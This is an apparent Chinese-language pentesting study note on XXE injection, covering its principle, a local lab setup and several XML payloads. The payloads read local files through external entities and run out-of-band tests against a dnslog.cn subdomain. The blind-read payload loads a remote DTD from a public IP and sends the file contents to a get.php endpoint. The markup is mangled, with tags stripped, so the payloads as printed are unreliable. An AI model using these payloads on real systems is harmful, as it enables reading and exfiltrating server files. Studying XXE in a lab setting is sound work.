- 链接:https://pan.baidu.com/s/1TrPpubuF_Yqa4f12J-dljQ?pwd=8j7i
- 提取码:8j7i
XXE 黑盒发现:
参考:https://www.cnblogs.com/20175211lyz/p/11413335.html
漏洞利用原理
客户端:xml发送数据
服务端:xml解析数据
利用xml写一个带有文件读取的代码尝试发送,类似文件功能读取实现
漏洞复现
环境搭建(本地搭建)
- "1.0"?>
- Mikasa [
- test SYSTEM "file:///d:/e.txt">
- ]>
- <user><username>&test;username><password>Mikasapassword>
- r>
再本地D盘新建e.txt文件,然后写入“成功获取”
2、带外测试:
文件读取的时候,如果没有数据回显,那么我们就无法判断是否有漏洞,通过带外测试可以判断漏洞是否存在,而且能向外发送数据 //dnslog.cn
- "1.0" ?>
- test [
- file SYSTEM "http://9v57ll.dnslog.cn">
- %file;
- ]>
- <user><username>&send;username><password>Mikasapassword>
- r>
3、外部引用实体 dtd:
1,解决拦截绕过问题
2,解决诗句不回显问题
- "1.0" ?>
- test [
- file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
- %file;
- ]>
- <user><username>&send;username><password>Mikasapassword>
- r>
- evil2.dtd
- send SYSTEM "file:///d:/e.txt">
4、无回显读文件
- "1.0"?>
- ANY[
- file SYSTEM "file:///d:/e.txt">
- remote SYSTEM "http://47.94.236.117/test.dtd">
- %remote;
- %all;
- ]>
- <root>&send;root>
- test.dtd
- all "
- 'http://47.94.236.117/get.php?file=%file;'>">
XML&XXE 前端 CTF& Jarvisoj& 探针 利用
XML&XXE 白盒 CMS& PHPSHE& 无回显审计